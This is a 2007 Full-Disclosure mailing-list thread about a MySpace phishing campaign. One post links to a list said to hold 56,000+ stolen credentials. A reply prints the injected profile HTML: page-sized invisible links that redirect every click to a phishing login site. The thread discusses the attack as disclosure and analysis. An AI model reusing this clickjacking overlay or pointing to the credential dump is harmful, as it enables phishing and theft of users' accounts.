http://www.ninjahype.org/mov/
nameHREFTrack -KF wac wrote: > > > On 1/16/07, *Deepan* <[EMAIL PROTECTED] > <mailto:[EMAIL PROTECTED]>> wrote: > > On Mon, 2007-01-15 at 23:05 -0500, Peter Dawson wrote: > > "but at some point all this abuse will likely start sending > users off > > to another service. " > > > > thats only --if the know if they are being abused.. most of them > are > > not coherent about any such issues.. > > > > > > > > On 1/15/07, Kevin Pawloski <[EMAIL PROTECTED] > <mailto:[EMAIL PROTECTED]>> wrote: > > The level of phishing sites targeting MySpace and bot > related > It is not quiet easy to fool 56000+ users using phishing sites. I > wonder > how Mark is doing it. > > > > Hmm... Oh no is very easy, yes very easy what he is doing. He left > some traces on some of the "cracked" accounts, I was expectig of > somebody to comment earlier since I've been a couple of hours since > the initial post. > > When you modify a profile you can add this to the data of the profile, > you know those HTML customizations. I found this on one of the > accounts that really got my attention a little bit more than the girl > of the account :P > > HOLA!!!!<a style="text-decoration:none;position: > absolute;top:1px;left:1px;" href="http://marcolano.com/login/";><img > style="border-width:0px;width:2024px; height:1768px;" > src="http://x.myspace.com/images/clear.gif";></a><a > style="text-decoration:none;position: absolute;top:1px;left:1px;" > href="http://marcolano.com/login/";><img > style="border-width:0px;width:2024px; height:1768px;" > src="http://x.myspace.com/images/clear.gif";></a><embed > allowScriptAccess="never" allowNetworking="internal" > enableJSURL="false" enableHREF="false" saveEmbedTags="true" > src="http://www.../mov/cid_3277_f.mov"; width="1" height="1"> > > As you might see, this creates a huge invisible link in the page in > front of everything, so when you click into anything on the page like > a link or anything it will take you to that phising website so ppl > beleive that the account expired and enter their user+pass. Now I > beleive that his message was a way to tell about a BUG in myspace that > should filter that content and it is not doing it. So... we are in > fact not talking about a stupid phishing website for those who still > beleive that. > > Regards > Waldo > > > > activity that has been targeting MySpace lately is pretty > > alarming. Granted there is no real financial risk if an > > account gets compromised for the user but at some point all > > this abuse will likely start sending users off to another > > service. > > > > Kevin > > > > > > On 1/15/07, North, Quinn <[EMAIL PROTECTED] > <mailto:[EMAIL PROTECTED]>> wrote: > > "[EMAIL PROTECTED] > :doyouhonestlythinkiwillputmyrealpass > > wordhere" > > > > ...at least there is some hope left in the world :-\ > > > > --=Q=-- > > > > -----Original Message----- > > From: [EMAIL PROTECTED] > <mailto:[EMAIL PROTECTED]> > > [mailto: > [EMAIL PROTECTED] > <mailto:[EMAIL PROTECTED]>] On > > Behalf Of Emma > > Perdue > > Sent: Monday, January 15, 2007 7:48 AM > > To: [email protected] > <mailto:[email protected]> > > Subject: [Full-disclosure] Grab a myspace credential > > > > 56000+ and counting > > > > http://www.marcolano.com/login/myspace.txt > > > > -- > > *Emma aka TINK* > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: > > > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - > http://secunia.com/ > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: > > > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - > http://secunia.com/ > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > -- > ----------------------------------------------- > Regards > Deepan Chakravarthy N > http://www.codeshepherd.com/ > http://sudoku-solver.net/ > > I am a programmer by day, > I dig grave for other programmers by night. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > <http://secunia.com/> > > > ------------------------------------------------------------------------ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
![http://x.myspace.com/images/clear.gif"](http://x.myspace.com/images/clear.gif"){kind=link}